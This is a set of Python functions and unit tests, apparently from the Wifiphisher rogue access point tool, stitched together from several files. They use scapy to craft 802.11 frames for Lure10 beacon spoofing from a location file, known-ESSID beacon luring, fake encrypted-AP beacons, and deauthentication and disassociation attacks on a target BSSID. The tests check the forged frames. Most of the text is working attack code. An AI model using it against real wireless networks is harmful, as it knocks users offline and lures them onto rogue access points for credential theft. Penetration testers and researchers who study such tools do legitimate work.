def setUp(self): """ Set up the tests """ essid = dot11.Dot11Elt(ID='SSID', info="") rates = dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = dot11.Dot11Elt(ID='DSset', info='\x06') self.packet = dot11.RadioTap() / dot11.Dot11() / essid / rates / dsset custom_tuple = collections.namedtuple( "test", ("target_ap_bssid target_ap_channel rogue_ap_mac args " "target_ap_essid is_freq_hop_allowed")) self.target_channel = "6" self.target_bssid = "BB:BB:BB:BB:BB:BB" self.rogue_mac = "CC:CC:CC:CC:CC:CC" self.target_essid = "Evil" self.args = mock.Mock() self.args.deauth_essid = False self.args.channel_monitor = False data0 = custom_tuple(self.target_bssid, self.target_channel, self.rogue_mac, self.args, self.target_essid, True) data1 = custom_tuple(None, self.target_channel, self.rogue_mac, self.args, self.target_essid, True) self.deauth_obj0 = deauth.Deauth(data0) self.deauth_obj1 = deauth.Deauth(data1) # test for --deauth-essid self.deauth_obj0._deauth_bssids = dict() self.deauth_obj1._deauth_bssids = dict()
def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet :param self: A Lure10 object :param packet: A scapy.layers.RadioTap object :type self: Lure10 :type packet: scapy.layers.RadioTap :return: A tuple containing ["*"] followed by a list of the crafted beacon frames :rtype: tuple(list, list) .. warning: pkt is not used here but should not be removed since this prototype is requirement """ beacons = list() bssid = str() # initiliate the _packets_to_send in first run if self.first_run: self._packets_to_send["*"] = beacons # only run this code once if self.first_run and self.data.args.lure10_exploit: # locate the lure10 file area_file = constants.LOCS_DIR + self.data.args.lure10_exploit with open(area_file) as _file: for line in _file: # remove any white space and store the bssid(fist word) line.strip() bssid = line.split(" ", 1)[0] # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11(subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=0x2105) frame_part_3 = dot11.Dot11Elt(ID="SSID", info="") frame_part_4 = dot11.Dot11Elt(ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = (frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) logger.debug("Add lure10-beacon frame with BSSID %s", bssid) # add the frame to the list beacons.append(complete_frame) # make sure this block is never executed again and the notification occurs self.first_run = False self._packets_to_send["*"] = beacons return self._packets_to_send
def test_is_packet_valid_packet_valid(): """ Test is_packet_valid function with an packet that is not Dot11Beacon """ address = "FF:FF:FF:FF:FF:FF" packet = (dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Beacon() / dot11.Dot11Elt(ID=0, info="MY AP") / dot11.Dot11Elt() / dot11.Dot11Elt(ID=3, info=chr(2))) assert recon.is_packet_valid(packet) == True
def test_get_new_ap_packet_no_encryption(sniff): """ Test get_new_ap function with a packet where AP is not encrypted """ name = "MY_AP" channel = 2 address = "FF:FF:FF:FF:FF:FF" packet = (dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Beacon(cap=0x0000) / dot11.Dot11Elt(ID=0, info=name) / dot11.Dot11Elt() / dot11.Dot11Elt(ID=3, info=chr(channel))) sniff.return_value = [packet] assert recon.get_new_ap("wlan0") == (name, channel, address, False)
def test_get_new_ap_valid_packet(sniff): """ Test get_new_ap function with a valid(standard) packet """ name = "MY_AP" channel = 2 address = "FF:FF:FF:FF:FF:FF" packet = (dot11.Dot11(type=0, subtype=10, addr3=address) / dot11.Dot11Beacon(cap=0x1111) / dot11.Dot11Elt(ID=0, info=name) / dot11.Dot11Elt() / dot11.Dot11Elt(ID=3, info=chr(channel))) sniff.return_value = [packet] assert recon.get_new_ap("wlan0") == (name, channel, address, True)
def __init__(self, iface, essid, bssid, channel, beacon_interval_sec, packet_callback): self.active = False self.iface = iface self.essid = essid self.bssid = bssid self.channel = channel self.beacon_interval_sec = beacon_interval_sec self.packet_callback = packet_callback self.start_time_secs = time.time() self.sc = 0 self.sender = PacketSender(self.iface) self.beacon_packet = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff', \ addr2=self.bssid, \ addr3=self.bssid) \ / dot11.Dot11Beacon(cap='ESS+privacy') \ / dot11.Dot11Elt(ID='SSID', \ info=self.essid) \ / dot11.Dot11Elt(ID='DSset', \ info=chr(self.channel)) \ / dot11.Dot11Elt(ID='Rates', \ info='\x82\x84\x0b\x16') \ / dot11.Dot11Elt(ID='RSNinfo', info='\x01\x00\x00\x0f\xac' \ '\x04\x01\x00\x00\x0f' \ '\xac\x04\x01\x00\x00' \ '\x0f\xac\x02\x00\x00') self.watchers = { "interval": None, "timeout": None } self.loop = pyev.Loop() # initialize and start a signal watchers sigterm_watcher = pyev.Signal(signal.SIGTERM, self.loop, self.sigterm_cb) sigterm_watcher.start() sigint_watcher = pyev.Signal(signal.SIGINT, self.loop, self.sigint_cb) sigint_watcher.start() self.loop.data = [sigterm_watcher, sigint_watcher] self.sniff_thread = Thread(target=self.sniff, kwargs=dict(), name='sniff-thread') self.sniff_thread.setDaemon(True)
def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet. :param self: A Lure10 object. :param packet: A scapy.layers.RadioTap object. :type self: Lure10 :type packet: scapy.layers.RadioTap :return: list with the crafted beacon frames :rtype: list """ beacons = [] if self.first: if self.data.args.lure10_exploit: area_file = constants.LOCS_DIR + self.data.args.lure10_exploit with open(area_file) as a_file: wlans = [x.strip() for x in a_file.readlines()] for wlan in wlans: bssid, essid = wlan.split(' ', 1) # Frequency for channel 7 frequency = struct.pack("<h", 2407 + 7 * 5) ap_rates = "\x0c\x12\x18\x24\x30\x48\x60\x6c" frame = dot11.RadioTap( len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + frequency + '\xc0\x00\xc0\x01\x00\x00') / dot11.Dot11( subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / dot11.Dot11Beacon( cap=0x2105) / dot11.Dot11Elt( ID='SSID', info="") / dot11.Dot11Elt( ID='Rates', info=ap_rates) / dot11.Dot11Elt( ID='DSset', info=chr(7)) beacons.append(frame) self.beacons_num = len(beacons) self.first = False return (["*"], beacons)
def _get_known_beacons(self): """ Retrieve the popular ESSIDs from the text file and then construct all the known beacon frames. :param self: A Beacons object :type self: Beacons :return: A list with all the beacon frames :rtype: list """ beacons = list() essid = str() bssid = self.data.rogue_ap_mac # locate the known WLANS file area_file = constants.KNOWN_WLANS_FILE with open(area_file) as _file: for line in _file: if line.startswith("!"): continue essid = line.rstrip() # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11( subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=constants.KB_BEACON_CAP) frame_part_3 = dot11.Dot11Elt(ID="SSID", info=essid) frame_part_4 = dot11.Dot11Elt( ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = ( frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) # add the frame to the list beacons.append(complete_frame) return beacons
def add_lure10_beacons(self, area_file): with open(area_file) as f: wlans = [x.strip() for x in f.readlines()] for w in wlans: bssid, essid = w.split(' ', 1) # Frequency for channel 7 frequency = struct.pack("<h", 2407 + 7*5) ap_rates = "\x0c\x12\x18\x24\x30\x48\x60\x6c" frame = dot11.RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', \ notdecoded='\x00\x6c' + frequency + \ '\xc0\x00\xc0\x01\x00\x00') \ / dot11.Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) \ / dot11.Dot11Beacon(cap=0x2105) \ / dot11.Dot11Elt(ID='SSID', info="") \ / dot11.Dot11Elt(ID='Rates', info=ap_rates) \ / dot11.Dot11Elt(ID='DSset', info=chr(7)) self._deauthentication_packets.append(frame)
def test_get_packet_broadcast(self): """ Test get_packet method for crafting the broadcast frame """ # setup the packet sender = "00:00:00:00:00:00" receiver = "11:11:11:11:11:11" essid = dot11.Dot11Elt(ID='SSID', info="") rates = dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = dot11.Dot11Elt(ID='DSset', info='\x06') packet = dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon( ) / essid / rates / dsset packet.addr1 = receiver packet.addr2 = sender packet.addr3 = self.target_bssid packet.FCfield = 0x0 # run the method pkts_to_send = self.deauth_obj0.get_packet(packet) message0 = "Failed to return an correct channel" message1 = "Failed to return an correct packets" # check channel: target channel should be one key of # the result self.assertEqual(self.target_channel in pkts_to_send, True, message0) # check the packets # check the disassoction packet result = pkts_to_send[self.target_channel] self.assertEqual(result[0].subtype, 10, message1) self.assertEqual(result[0].addr1, constants.WIFI_BROADCAST, message1) self.assertEqual(result[0].addr2, self.target_bssid, message1) self.assertEqual(result[0].addr3, self.target_bssid, message1) # check the deauthentication packet self.assertEqual(result[1].subtype, 12, message1) self.assertEqual(result[1].addr1, constants.WIFI_BROADCAST, message1) self.assertEqual(result[1].addr2, self.target_bssid, message1) self.assertEqual(result[1].addr3, self.target_bssid, message1)
def test_is_target_essid_non_decodable_error(self): """ Assign essid to a constant when it is utf-8 non-decodable """ essid = dot11.Dot11Elt(ID='SSID', info='\x99\x87\x33') packet = dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon() / essid packet.addr3 = "99:99:99:99:99:99" result = self.deauth_obj0._is_target(packet) expected = False message = 'Fail to raise the UnicodeDecodeError for non-printable essid' self.assertEqual(result, expected, message)
def __init__(self, ap): threading.Thread.__init__(self) self.ap = ap self.device = NetworkTransmitter(self.ap.iface) self.interval = 0.1 self.beacon_pckt = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff', \ addr2=self.ap.bssid,\ addr3=self.ap.bssid) \ / dot11.Dot11Beacon(cap='ESS+privacy') \ / dot11.Dot11Elt(ID='SSID', \ info=self.ap.essid) \ / dot11.Dot11Elt(ID='DSset', \ info=chr(self.ap.channel)) \ / dot11.Dot11Elt(ID='Rates', \ info='\x82\x84\x0b\x16') \ / dot11.Dot11Elt(ID='RSNinfo', info='\x01\x00\x00\x0f\xac' \ '\x04\x01\x00\x00\x0f' \ '\xac\x04\x01\x00\x00' \ '\x0f\xac\x02\x00\x00') self.setDaemon(True)
def setUp(self): """ Set up the tests """ essid = dot11.Dot11Elt(ID='SSID', info="") rates = dot11.Dot11Elt(ID='Rates', info="\x03\x12\x96\x18\x24\x30\x48\x60") dsset = dot11.Dot11Elt(ID='DSset', info='\x06') self.packet = dot11.RadioTap() / dot11.Dot11() / essid / rates / dsset custom_tuple = collections.namedtuple( "test", "target_ap_bssid target_ap_channel rogue_ap_mac") self.target_channel = "6" self.target_bssid = "BB:BB:BB:BB:BB:BB" self.rogue_mac = "CC:CC:CC:CC:CC:CC" data0 = custom_tuple(self.target_bssid, self.target_channel, self.rogue_mac) data1 = custom_tuple(None, self.target_channel, self.rogue_mac) self.deauth_obj0 = deauth.Deauth(data0) self.deauth_obj1 = deauth.Deauth(data1)
def test_is_target_target_ap_bssid_true(self): """ Get the target attacking bssid for the speficic ESSID when --essid is not used """ essid = dot11.Dot11Elt(ID='SSID', info="Evil") packet = dot11.RadioTap() / dot11.Dot11() / dot11.Dot11Beacon() / essid packet.addr3 = "99:99:99:99:99:99" self.deauth_obj0._data.args.deauth_essid = "Evil" result = self.deauth_obj0._is_target(packet) expected = True message = "Fail to check the attacking essid: " + self.target_essid self.assertEqual(result, expected, message)